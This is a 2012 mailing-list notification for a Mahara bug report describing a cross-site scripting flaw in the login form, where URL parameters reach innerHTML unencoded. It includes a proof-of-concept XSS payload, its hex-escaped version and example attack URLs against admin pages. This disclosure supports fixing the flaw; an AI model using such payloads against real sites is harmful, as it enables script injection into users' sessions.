[Mahara-contributors] [Bug 1009784] Re: Javascript login form includes unencoded parameters

Mon, 30 Jul 2012 23:31:27 -0700 

** This bug has been flagged as a security vulnerability

-- 
You received this bug notification because you are a member of Mahara
Contributors, which is subscribed to Mahara.
https://bugs.launchpad.net/bugs/1009784

Title:
  Javascript login form includes unencoded parameters

Status in Mahara ePortfolio:
  Fix Released

Bug description:
  Discovered by Emanuel Bronshtein, present in all versions.

   parameters from URI are passed to javascript innerHTML without proper 
encoding,  it possible to use some encoding inside javascript strings, as:
   \x22\x3E = ">
   \u0022\u003E = ">
   by using this encoding it possible to trigger XSS.

   Payload:
   "><h1>XSS</h1><img src=9 onerror=alert("XSS")>  =  
\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E

   XSS Example:
   
http://localhost/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/changeuser.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
   
http://localhost/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/bulk.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E
  ---

  When a logged-out user tries to access a page that requires them to be
  logged in, a login form is generated, all get parameters are added to
  the form's action attribute & all post parameters are added as hidden
  elements inside the form.  The login form is then inserted into the
  dom using innerHTML.  This is for convenience, to let the user
  continue whatever it was they were trying to do if, for example, their
  session expired.  I think it may be enough to url encode each query
  parameter name & value in the action url before generating the form,
  but haven't tested this yet.

To manage notifications about this bug go to:
https://bugs.launchpad.net/mahara/+bug/1009784/+subscriptions

_______________________________________________
Mailing list: https://launchpad.net/~mahara-contributors
Post to     : mahara-contributors@lists.launchpad.net
Unsubscribe : https://launchpad.net/~mahara-contributors
More help   : https://help.launchpad.net/ListHelp

Reply via email to